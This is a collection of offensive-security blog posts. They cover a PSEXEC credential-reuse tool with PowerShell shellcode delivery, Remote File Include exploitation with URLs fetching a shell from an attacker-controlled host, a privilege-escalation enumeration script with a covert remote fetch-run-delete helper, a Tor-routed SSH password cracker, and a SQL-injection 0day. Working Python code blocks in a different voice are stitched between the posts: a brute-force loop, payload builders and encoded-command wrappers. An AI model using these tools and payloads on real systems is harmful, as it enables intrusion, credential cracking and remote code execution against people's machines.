Showing posts with label Hood3dRob1n. Show all posts

Friday, November 8, 2013

Yet Another SMB PSEXEC (Y.A.S.P) Tool

I was working on my own version of an updated standalone PSEXEC tool in Ruby, leveraging the MSF standalone as a base along with some of the newer modules that have been released. Unfortunately SMBEXEC 2.0 was recently released, which pretty much does the same thing functionality-wise but has threading, so it's probably a bit cooler, but I thought I would still post mine out there for anyone who cares to take it for a spin. It is single-target focused and a little different in the look and feel in comparison to some of the others available, so who knows. It works for me; hope it works for someone else too....

I first started off trying to do things on my own by writing classes to wrap the smbclient tool, which now supports the pass-the-hash option or can be fairly easily patched to add it. The Samba suite also includes the rpcclient tool, which I originally planned to leverage to make some magic happen. Well, I got the wrappers working but was not able to get things fully working with just these two classes. I do recommend playing around with rpcclient as it is an interesting tool and can lead to a lot of insight against a remote target, but that's another story. So after giving up on the rpcclient option I did some checking on the net and found some great references from Mubix and Chris Gates on the MSF standalone tool and some ways to play with it. As Chris and Rob point out, the librex library is available outside of MSF as a standalone gem, which gives you tons of power to do all kinds of neat things on your own. Being that the hard work was already done and available as reference in MSF, I decided to borrow what I could from there and merge it with my own wrappers and code to get what I wanted. The end result is an smbclient with all the psexec fun and then some.

It can do some basic recon without creds, which I am working on improving, but its main focus is on re-using valid credentials. Once authenticated it's capable of running single commands using the PSEXEC technique or jumping into a pseudo-shell to execute multiple commands.


Download registry hives for offline pillaging


Leverage MSFVENOM to generate shellcode and then run payloads using PowerShell (my favorite):

NOTE: You need to specify the hostname for Vista+ targets or the connection will fail. You can use raw NetBIOS requests or a tool like nbtscan to find this pretty quickly and without any pain. On older targets you can omit this field from the connection configuration.
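Since the hostname is required for Vista+ targets, here is what the "raw NetBIOS request" route looks like. This is an added example written for this page, not code from Y.A.S.P. or nbtscan: it builds the same NBSTAT (node status) query those tools send to UDP/137, parses the name table out of the reply, and picks the unique <00> entry (the computer name) and the group <00> entry (workgroup/domain). The sample reply is constructed, not a real capture; the function and host names are hypothetical.

```python
import socket
import struct

NBNS_PORT = 137
NBSTAT_QTYPE = 0x0021       # NBSTAT: node status request
NB_CLASS_IN = 0x0001
GROUP_NAME_FLAG = 0x8000    # set on group (workgroup/domain) names, clear on unique names


def encode_nb_name(name: bytes) -> bytes:
    """First-level encode a NetBIOS name (RFC 1001 14.1): pad to 16 bytes, then emit
    each nibble as a letter 'A'..'P'. The wildcard "*" asks the node for all its names."""
    padded = name.ljust(16, b"\x00")
    encoded = bytearray()
    for b in padded:
        encoded.append(ord("A") + (b >> 4))
        encoded.append(ord("A") + (b & 0x0F))
    return bytes([len(encoded)]) + bytes(encoded) + b"\x00"


def build_node_status_request(txid: int = 0x1337) -> bytes:
    """NBSTAT query packet for UDP/137 (the same thing nbtscan / nbtstat -A send)."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)  # id, flags, QD, AN, NS, AR
    question = encode_nb_name(b"*") + struct.pack(">HH", NBSTAT_QTYPE, NB_CLASS_IN)
    return header + question


def parse_node_status_response(data: bytes) -> dict:
    """Pull the name table and MAC address out of a node status response."""
    txid, _flags, _qd, ancount, _ns, _ar = struct.unpack_from(">HHHHHH", data, 0)
    if ancount < 1:
        raise ValueError("no answer record")
    off = 12
    off += 1 + data[off] + 1                          # skip the encoded RR name
    rtype, _rclass, _ttl, _rdlen = struct.unpack_from(">HHIH", data, off)
    off += 10
    if rtype != NBSTAT_QTYPE:
        raise ValueError("not a node status response")
    num_names = data[off]
    off += 1
    names = []
    for _ in range(num_names):                        # 18-byte entries: name, suffix, flags
        raw, suffix, flags = struct.unpack_from(">15sBH", data, off)
        off += 18
        names.append({"name": raw.rstrip(b" \x00").decode("ascii", "replace"),
                      "suffix": suffix,
                      "group": bool(flags & GROUP_NAME_FLAG)})
    mac = data[off:off + 6]                           # unit ID (MAC) leads the statistics block
    return {"txid": txid, "names": names, "mac": ":".join("%02x" % b for b in mac)}


def pick_hostname(parsed: dict):
    """Unique name with suffix <00> is the computer name (what the tool needs)."""
    for n in parsed["names"]:
        if n["suffix"] == 0x00 and not n["group"]:
            return n["name"]
    return None


def pick_domain(parsed: dict):
    """Group name with suffix <00> is the workgroup or domain."""
    for n in parsed["names"]:
        if n["suffix"] == 0x00 and n["group"]:
            return n["name"]
    return None


def query_host(ip: str, timeout: float = 2.0) -> dict:
    """Send the request to a live host and parse the reply (needs network access)."""
    txid = 0x1337
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(txid), (ip, NBNS_PORT))
        data, _ = s.recvfrom(4096)
    parsed = parse_node_status_response(data)
    if parsed["txid"] != txid:
        raise ValueError("transaction id mismatch")
    return parsed


def build_sample_response(txid: int = 0x1337) -> bytes:
    """Constructed reply (not a real capture) for trying the parser offline: a
    hypothetical box named WIN7-TARGET in workgroup WORKGROUP."""
    entries = [(b"WIN7-TARGET", 0x00, 0x0400),   # unique, active: computer name
               (b"WORKGROUP", 0x00, 0x8400),     # group: workgroup/domain
               (b"WIN7-TARGET", 0x20, 0x0400)]   # unique: server service
    table = bytes([len(entries)])
    for name, suffix, flags in entries:
        table += struct.pack(">15sBH", name.ljust(15, b" "), suffix, flags)
    rdata = table + bytes.fromhex("000c29aabbcc") + bytes(40)   # MAC + zeroed statistics
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    rr = encode_nb_name(b"*") + struct.pack(">HHIH", NBSTAT_QTYPE, NB_CLASS_IN, 0, len(rdata))
    return header + rr + rdata
```

`query_host("10.0.0.5")` is the live call; everything else runs offline against `build_sample_response()`. Hosts that have NetBIOS over TCP/IP disabled or firewall UDP/137 will simply time out, in which case the hostname has to come from elsewhere (DNS PTR, LDAP, or the SMB negotiate response).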

The full list of available options once authenticated:


And here are a few demo videos I made to show off how you can use it....

Y.A.S.P. vs Standalone 2k3 Server:



Y.A.S.P. + PowerShell Payload vs Windows 7:
NOTE: It does leverage MSFVENOM currently to generate shellcode, which gets converted over to a PowerShell-acceptable format and then executed via a PowerShell command.
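To make the "converted over to a PowerShell-acceptable format" step concrete, here is an added example (written for this page; not Y.A.S.P.'s own conversion code): it renders raw msfvenom output as a PowerShell byte-array literal and wraps a script for `-EncodedCommand`, which expects base64 of UTF-16LE rather than UTF-8. It also checks the one thing that bites in practice: the encoded script grows by about 2.7x, and a command line that passes through cmd.exe is capped at 8191 characters. The shellcode bytes are a constructed sample, the function names are hypothetical, and the PowerShell memory-injection stub that would actually run the bytes is deliberately not part of this example.

```python
import base64

CMD_EXE_LIMIT = 8191          # longest command line cmd.exe accepts (Microsoft KB 830473)
CREATEPROCESS_LIMIT = 32767   # hard limit on lpCommandLine for CreateProcess


def shellcode_to_ps_array(shellcode: bytes, var: str = "$sc", per_line: int = 16) -> str:
    """Render raw msfvenom output as a PowerShell [Byte[]] literal. A line that ends in
    a comma continues the array on the next line, so long payloads stay readable."""
    hexes = ["0x%02x" % b for b in shellcode]
    rows = [",".join(hexes[i:i + per_line]) for i in range(0, len(hexes), per_line)]
    return "[Byte[]] %s = %s" % (var, ",\n".join(rows))


def encode_command(script: str) -> str:
    """-EncodedCommand takes base64 of the script encoded as UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse of encode_command; handy when triaging a suspicious process command line."""
    return base64.b64decode(blob).decode("utf-16le")


def powershell_command_line(script: str) -> str:
    """The command a psexec-style tool would hand to the remote service."""
    return ("powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass "
            "-WindowStyle Hidden -EncodedCommand " + encode_command(script))


def fits_command_line(cmdline: str, limit: int = CMD_EXE_LIMIT) -> bool:
    """Staged payloads of a few hundred bytes fit; a few KB of stageless shellcode does
    not and has to be delivered another way (file drop, download cradle)."""
    return len(cmdline) <= limit
```

`decode_command` is the same transform blue teams apply when a `-EncodedCommand` shows up in process creation logs, which is also why this launch style is so widely signatured.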




Y.A.S.P. vs 2k3 Domain Controller + Active Directory Dumping 101:



You can find all the source code along with all the tools used or referenced in the above videos on my github page here: SOURCE + TOOLS

You can keep an eye on GitHub as I will be working on this one over time to smooth out a few things and add a few more things to it which I wasn't comfortable with rolling out just yet, but again, just sharing to share and inspire more coders to code cool shit. Until next time, Enjoy!

Tuesday, May 15, 2012

Remote File Include (RFI) Exploitation

Remote File Includes (a.k.a. RFI) work in the same way Local File Includes (LFI) work, with the main difference being that instead of including local files we include remote pages from a different site and domain. The underlying flaw is the same as in LFI vulns, but exploiting it remotely requires the PHP settings allow_url_fopen AND allow_url_include to both be ON. allow_url_include has defaulted to Off since it was introduced in PHP 5.2.0, which is why RFI is much rarer than LFI on current targets.

LFI: no special configuration required (include() reads local paths regardless)
RFI: allow_url_fopen = On AND allow_url_include = On

When these conditions are met we can perform a Remote File Inclusion with disastrous effects on the target site, just as you have seen in the past with LFI. We can include PHP code from a remote site, use it to perform command execution on the target, and ultimately leverage that to perform a full system compromise.

RFI technique can be used with straight inclusions:
  <?php
  // $page is attacker-controlled and handed to include() unchanged
  $page = $_GET['page'];
  include($page);
  ?>

As well as with NULL byte inclusions where we need to kill an appended file extension or similar:
  <?php
  // the application appends ".php", so the attacker has to neutralise the suffix
  $page = $_GET['page'];
  include($page . ".php");
  ?>
In order to get our code included we need to host it on a site we control, stored as plain text rather than as a PHP file (i.e. shell.txt instead of shell.php); otherwise our own server would execute the code before serving it and the target would only include the output. We then replace the vulnerable parameter value with a reference to our remote host (http://controlled.com/shell.txt). When the vulnerable include appends a file extension, adding a "?" to the end of our URL turns whatever the application appends into a query string on the request to our server, which simply ignores it, so shell.txt is still what gets fetched. Our final exploit request links look like this:

Straight Include:
http://target.com/vuln.php?page=http://controlled.com/shell.txt

OR, to kill an appended extension, use the "?" trick or a NULL byte (the NULL byte only works on PHP versions before 5.3.4, which started rejecting paths containing NULL):
http://target.com/vuln.php?page=http://controlled.com/shell.txt?
http://target.com/vuln.php?page=http://controlled.com/shell.txt%00

Depending on which technique you use you should find (if vulnerable) that your remote code is now being included on the target page. With the above code examples the include() call ends up evaluating the following:

Straight Include: include('http://controlled.com/shell.txt');
OR
"?" trick against the appended extension: include('http://controlled.com/shell.txt?.php');
OR
NULL Byte against the appended extension: include('http://controlled.com/shell.txt\0.php'); (cut at the NULL byte on PHP < 5.3.4; refused outright on newer versions)

This results in our remote code being included and executed in the context of the target page. Including a harmless remote page (Google, for example) is enough to confirm that the site is vulnerable, but to compromise it you need to include a full-featured shell or custom code hosted on your controlled server and then leverage that for command execution and a permanent foothold on the target server.
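As an added example (written for this page, not code from the post), the helper below builds the probe URLs for the three cases above and, using urllib's own URL parsing, models what the attacker's web server is actually asked for in each case, which is the reason the trailing "?" works against an appended ".php". The function names, the marker string and the hosts controlled.com / target.com are hypothetical, and the hosted probe file is assumed to be a harmless PHP echo rather than a shell. On the target side the fix is allow_url_include = Off plus an allowlist of includable page names.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def rfi_payloads(remote_code_url: str, appended_suffix: str = "") -> list:
    """Candidate values for the vulnerable parameter.

    include($page): the bare URL is enough.
    include($page . ".php"): append "?" so the suffix lands in the query string of the
    request to our server (ignored), or a NUL byte, which truncated the path on PHP < 5.3.4.
    """
    if not appended_suffix:
        return [remote_code_url]
    return [remote_code_url + "?", remote_code_url + "\x00"]


def php_include_argument(param_value: str, appended_suffix: str = "") -> str:
    """The string include() ends up with: our parameter plus whatever the code appends."""
    return param_value + appended_suffix


def remote_request(include_argument: str, php_truncates_nul: bool = True):
    """Model what the http:// stream wrapper asks our server for: (host, path, query).

    With php_truncates_nul=True (PHP < 5.3.4) the string is cut at the NUL byte;
    newer PHP refuses paths containing NUL outright, so the NUL trick yields None.
    """
    if "\x00" in include_argument:
        if not php_truncates_nul:
            return None
        include_argument = include_argument.split("\x00", 1)[0]
    parts = urlsplit(include_argument)
    return parts.netloc, parts.path, parts.query


def build_probe_url(target_url: str, param: str, payload: str) -> str:
    """Replace the vulnerable parameter in the target URL, percent-encoding the payload
    so the "?" and the NUL byte survive the trip (a raw "?" also works, since it already
    sits inside the query string)."""
    parts = urlsplit(target_url)
    query = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k != param]
    query.append((param, payload))
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(query), parts.fragment))


MARKER = "rfi-probe-7f3a9c"   # hosted probe.txt is assumed to contain: <?php echo 'rfi-probe-7f3a9c'; ?>


def confirms_inclusion(response_body: str, marker: str = MARKER) -> bool:
    """The marker only appears if our remote PHP was fetched AND executed; a page that
    merely echoes the submitted URL back will not contain it."""
    return marker in response_body
```

Sending the probe is just an HTTP GET of `build_probe_url(...)` followed by `confirms_inclusion(body)`; use a marker echo rather than a shell for the confirmation step so the check leaves nothing behind on the target.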

Here is a brief video I made to demonstrate how things should work for you if you come across this in one of your audits:


Hope you enjoyed the show....

Until next time, Enjoy!

The Inf0rm3r - Linux Enumeration Script

Hey Guys,

I am back and apologize for the lack of activity last month; life has been crazy lately. As some of you may or may not know, I have been trying to step up my post-exploitation skills as well as my general Linux skills. I recently jumped to Linux as my main day-to-day OS and have to say I've never been happier (other than Camtasia doesn't run on Linux). Anyway, I started looking into common tasks one should perform post shell access in order to increase one's chances of gaining root access and decided to try and write my first Linux script to help myself, and since I <3 my supporters I decided to share with you guys as well. Now everyone can download and run an exploit and cross their fingers and hope it works, but what if it doesn't? What if we want to still try and root the box? There are many methods one can use to still gain root access without pre-compiled exploits. I will link you to a great reference guide for some basic methods one can use to go about searching for ways to gain root access, and then I will give you my new script, which will try to take some of the pain out of the process for you by quickly identifying some key areas one can start looking at to get things done and/or dig out a bit more info. The tool for now only does pure enumeration, but I do have a few ideas for a private version which will continue development on into the future, who knows though. That being said, I give you the following which I have available now:

A really good newbie guide to actual rooting methods with some understandable examples:
http://www.dankalia.com/tutor/01005/0100501004.htm

There are many other write ups out there if you search hard and do some reading. This is just a tool give-away, not a how to root the box thread. I will try to continue posting more post exploit techniques as time allows in the near future...

To the Point - Downloads:
Inform3r.zip, contains the following:
Inf0rm3r.sh:
  •     Actual bash script which does the enumeration magic and can be run on its own
fetch3r:
  •     Side project from Inf0rm3r, a C-based app which remotely grabs the Inf0rm3r script, runs it, and deletes it so all that is left is the report file. Also no output in the terminal, so it can be easier on some systems (CentOS for example, which has buffer size issues due to the size being set at compile time)
SCRIPT SOURCE: https://pastee.org/b4gtz
  • PASS: I<3INTRA!
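To show the kind of "key areas" a post-exploitation enumeration script looks at, here is an added example written for this page; it is not Inf0rm3r.sh and does not reproduce it. It walks a filesystem for setuid/setgid binaries and world-writable files and directories (skipping sticky directories such as /tmp, where world-writable is expected), and lists PATH entries the current user can write to, which is the classic hijack point for root cron jobs and sudo rules. `build_demo_tree()` creates a constructed sample tree in a temp directory so the checks can be run offline; the function names are hypothetical.

```python
import os
import stat
import tempfile


def find_setuid_setgid(root: str = "/") -> list:
    """Regular files with the setuid or setgid bit set: (path, mode, owner uid).
    Known-vulnerable versions or custom binaries that shell out are the targets."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return sorted(hits)


def find_world_writable(root: str = "/", skip_sticky: bool = True) -> list:
    """World-writable files and directories (symlinks ignored). Sticky directories
    are skipped by default: only the owner can replace entries there."""
    hits = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode) or not st.st_mode & stat.S_IWOTH:
                continue
            if skip_sticky and stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX:
                continue
            hits.append(path)
    return sorted(hits)


def writable_path_dirs(path_env: str = None) -> list:
    """PATH entries the current user can write to: a same-named binary dropped there
    runs whenever a root cron job or sudo rule resolves the command through PATH."""
    if path_env is None:
        path_env = os.environ.get("PATH", "")
    return [d for d in path_env.split(":") if d and os.path.isdir(d) and os.access(d, os.W_OK)]


def enumerate_privesc(root: str = "/", path_env: str = None) -> dict:
    """One report dict, the shape a script like this would write out or mail."""
    return {"setuid_setgid": find_setuid_setgid(root),
            "world_writable": find_world_writable(root),
            "writable_path_dirs": writable_path_dirs(path_env)}


def build_demo_tree() -> str:
    """Constructed sample filesystem (not a real host) so the checks can run offline."""
    root = tempfile.mkdtemp(prefix="inf0rm3r_demo_")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    fake = os.path.join(bindir, "fakepasswd")
    with open(fake, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(fake, 0o4755)                          # setuid binary lookalike
    scripts = os.path.join(root, "opt", "scripts")
    os.makedirs(scripts)
    os.chmod(scripts, 0o777)                        # world-writable dir that ends up on a PATH
    tmp = os.path.join(root, "tmp")
    os.makedirs(tmp)
    os.chmod(tmp, 0o1777)                           # sticky, like the real /tmp
    return root
```

Against a real box call `enumerate_privesc("/")`; it reads only, so it is safe to run as an unprivileged user, and a full walk of `/` is the slow part, which is why scripts like this usually prune /proc and /sys.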
I also made a brief DEMO VIDEO to highlight it in action so you get an idea for what all it captures, have a look see:




NOTE: There is a function already created to handle emailing of the report file if you're running the standalone script. You just need to uncomment the code in the script and then pass an email address to the script as an argument when run. It requires /bin/mail from mailutils to be installed to work. I didn't get this properly installed and set up locally, so my testing only validated the logic, not the actual emailing itself, although I had a buddy state it was working for him, so it's up in the air for now (hence it being commented out for this release version; we will see what the future brings).

Big Shout-out and special thanks to Phaedrus for helping me out with a few live test environments to fine tune a few things and th3breacher for some of the email code, suggestions and feedback!

...and of course, Greetz to and from everyone in INTRA!

If you have any questions, suggestions or feedback of any kind do let me know as I want to improve this over time to really be something unique and handy for the community to have.

Until next time, Enjoy the pursuit for r00t!

Monday, March 19, 2012

Slow Brute SSH a.k.a. slowbrute.py - A Python Based SSH Cracker, that works!

OK, so today I will provide you with a quick introduction to a really awesome SSH cracker which is based on Python, called Slow Brute SSH. It is Python based but is still a Linux-only script which works to perform targeted dictionary attacks against a specific SSH user instance. It has the ability to execute commands upon success and has an amazing success detection rate. I ran into problems using NCRACK myself and was looking for something better for this protocol. I tested 4-5 of the better known SSH cracking tools out there and this was the one that received my top rating, mainly due to its simplistic design and easy usability. Many of the other tools I reviewed required different versions of LibSSH to be installed, particularly non-standard versions. This leads to tricky installations with tons of prerequisites in order to get things working. This tool works well right out of the box, as it should. It also presents successful findings in a super easy-to-read format. Here goes the quick overview…


Download and extract the tool to your Linux desktop (tar -zxvf downloadname). That's it! It is now installed and ready to go; just jump into the folder and enter the usual "./slowbrute.py --help" to see the list of command options:

You can see the command syntax is fairly easy to use and pick up. You can essentially just point and shoot and the tool does all the work; easy setup. If you want to use the TOR network for added anonymity, just turn on TOR prior to launching and then make sure you use the "-T" or "--tor" option to route through the standard TOR port and out to the target. If SSH is running on a non-standard port (i.e. not 22) then you can use the "-d" argument to specify the port to attack; if not provided the tool will assume the standard port 22 on the target. Not a lot to this one folks, simple and works well…
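The part of an SSH cracker that decides its "success detection rate" is how it tells a rejected password apart from a connection-level failure (reset, timeout, the server closing the session after MaxAuthTries): a tool that treats both as "wrong password" silently skips candidates and misses hits. The following is an added example written for this page, not slowbrute.py's code: a throttled single-user dictionary loop that retries the same candidate on transient errors, backs off between attempts, and fires a callback on success (the hook for "execute commands upon success"). The paramiko-backed login function assumes paramiko is installed and is not exercised offline; the fake server is a constructed stand-in, and routing through Tor (a SOCKS proxy on the socket) is not shown.

```python
import time


class AuthFailed(Exception):
    """The server answered and rejected the password: move on to the next candidate."""


class Transient(Exception):
    """Connection-level problem (reset, timeout, too many auth failures on one
    session): retry the same candidate instead of skipping it."""


def dictionary_attack(user, candidates, try_login, delay=0.5, max_retries=3, on_success=None):
    """Sequential, throttled dictionary attack against one SSH user.

    try_login(user, password) returns True on success, raises AuthFailed on a rejected
    password and Transient on anything else. Returns (password_or_None, attempts).
    """
    attempts = 0
    for password in candidates:
        retries = 0
        while True:
            attempts += 1
            try:
                success = try_login(user, password)
            except AuthFailed:
                break                        # next candidate
            except Transient:
                retries += 1
                if retries > max_retries:
                    raise                    # fail loudly rather than lose the candidate
                time.sleep(delay * retries)  # back off, then retry the same password
                continue
            if success:
                if on_success:
                    on_success(user, password)
                return password, attempts
            break
        time.sleep(delay)                    # the "slow" part: stay under lockout/fail2ban thresholds
    return None, attempts


def paramiko_login(host, port=22, timeout=5.0):
    """try_login implementation backed by paramiko (assumed installed; network required)."""
    import paramiko

    def try_login(user, password):
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            client.connect(host, port=port, username=user, password=password,
                           timeout=timeout, allow_agent=False, look_for_keys=False)
            return True
        except paramiko.AuthenticationException:
            raise AuthFailed()
        except (paramiko.SSHException, OSError) as exc:
            raise Transient(str(exc))
        finally:
            client.close()
    return try_login


def make_fake_server(real_password, fail_first_call=False):
    """Constructed stand-in for an SSH server so the loop can be run offline."""
    calls = {"n": 0}

    def try_login(user, password):
        calls["n"] += 1
        if fail_first_call and calls["n"] == 1:
            raise Transient("connection reset by peer")
        if password == real_password:
            return True
        raise AuthFailed()
    return try_login
```

Usage against a real host would be `dictionary_attack("root", open("words.txt").read().split(), paramiko_login("10.0.0.5", port=2222), delay=1.0)`; keep the delay non-zero, since most SSH daemons sit behind fail2ban-style rate limits and a fast loop only bans your source.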

Here is a quick video to show you how it works in action against a live target which NCRACK was unable to register a successful login against, hence this tutorial and tool highlight :)

Video up in next 24hrs....

Until next time, Enjoy!

Monday, January 9, 2012

MangosWeb SQL Vulnerability - My First 0day!

I was doing an assessment for a friend on his new site and I discovered a SQL POST injection vector via the login form being used in the CMS he had chosen. I worked my way through the site in my usual full detailed approach and when I was done I thought to myself - why is it vulnerable? I checked the CMS he was running and then I decided to start using the power of Google to see if I could find any other sites using the same software. I soon found a working dork which produced a ton of results and, lo and behold, the injection vector seemed to be present on almost all of them I came across. I had to play with the injection syntax to come up with a few universals, but I am happy to say that my work was published to the exploit-db and 1337day exploit database sites - made my year already!

Here are the links to the full details on the exploit:
Exploit-DB: http://www.exploit-db.com/exploits/18335/
1337day: http://www.1337day.com/exploits/17350

The point here is to always keep your eyes and ears open, as you never know what you might stumble across. If you find a vulnerability in one site, check to see whether you found a site-specific bug or a software bug which then affects multiple sites as opposed to a single site instance. The power of Google is amazing, and this goes to show hard work does pay off. I am excited and just wanted to share with everyone else who might be following my blogs. Please check back soon as I have several new tuts in the works and should have new content up very shortly. Until next time, Enjoy!